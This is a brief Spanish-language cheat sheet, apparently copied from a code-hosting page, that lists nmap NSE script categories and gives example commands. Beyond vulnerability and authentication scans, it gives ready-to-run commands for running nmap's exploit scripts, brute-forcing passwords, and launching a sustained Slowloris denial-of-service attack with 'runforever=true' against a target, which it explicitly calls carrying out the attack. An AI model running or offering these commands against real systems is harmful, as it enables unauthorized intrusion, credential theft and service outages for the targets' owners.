30 lines
1.4 KiB
Plaintext
30 lines
1.4 KiB
Plaintext
|
|
Scripts existentes para nmap:
|
|
Auth: ejecuta todos sus scripts disponibles para autenticación
|
|
Default: ejecuta los scripts básicos por defecto de la herramienta
|
|
Discovery: recupera información del target o víctima
|
|
External: script para utilizar recursos externos
|
|
Intrusive: utiliza scripts que son considerados intrusivos para la víctima o target
|
|
Malware: revisa si hay conexiones abiertas por códigos maliciosos o backdoors (puertas traseras)
|
|
Safe: ejecuta scripts que no son intrusivos
|
|
Vuln: descubre las vulnerabilidades más conocidas
|
|
All: ejecuta absolutamente todos los scripts con extensión NSE disponibles
|
|
|
|
Ejemplo de escaneo para vulnerabilidades:
|
|
nmap -Pn --script vuln <target.com or ip>
|
|
|
|
Ejemplo de escaneo de autenticación (contraseñas vacías o por defecto):
|
|
nmap -f -sS -sV --script auth <target.com or ip>
|
|
|
|
Uso de nmap para explotar las vulnerabilidades encontradas:
|
|
nmap --script exploit -Pn <target.com or ip>
|
|
|
|
Uso de nmap para ataques de fuerza bruta a passwords:
|
|
nmap --script brute -Pn <target.com or ip>
|
|
|
|
Uso de nmap para comprobar si se es vulnerable a un ataque DoS:
|
|
nmap --script dos -Pn <target.com or ip>
|
|
|
|
Uso de nmap para llevar acabo el ataque en caso de ser vulnerable:
|
|
nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true <target.com or ip>
|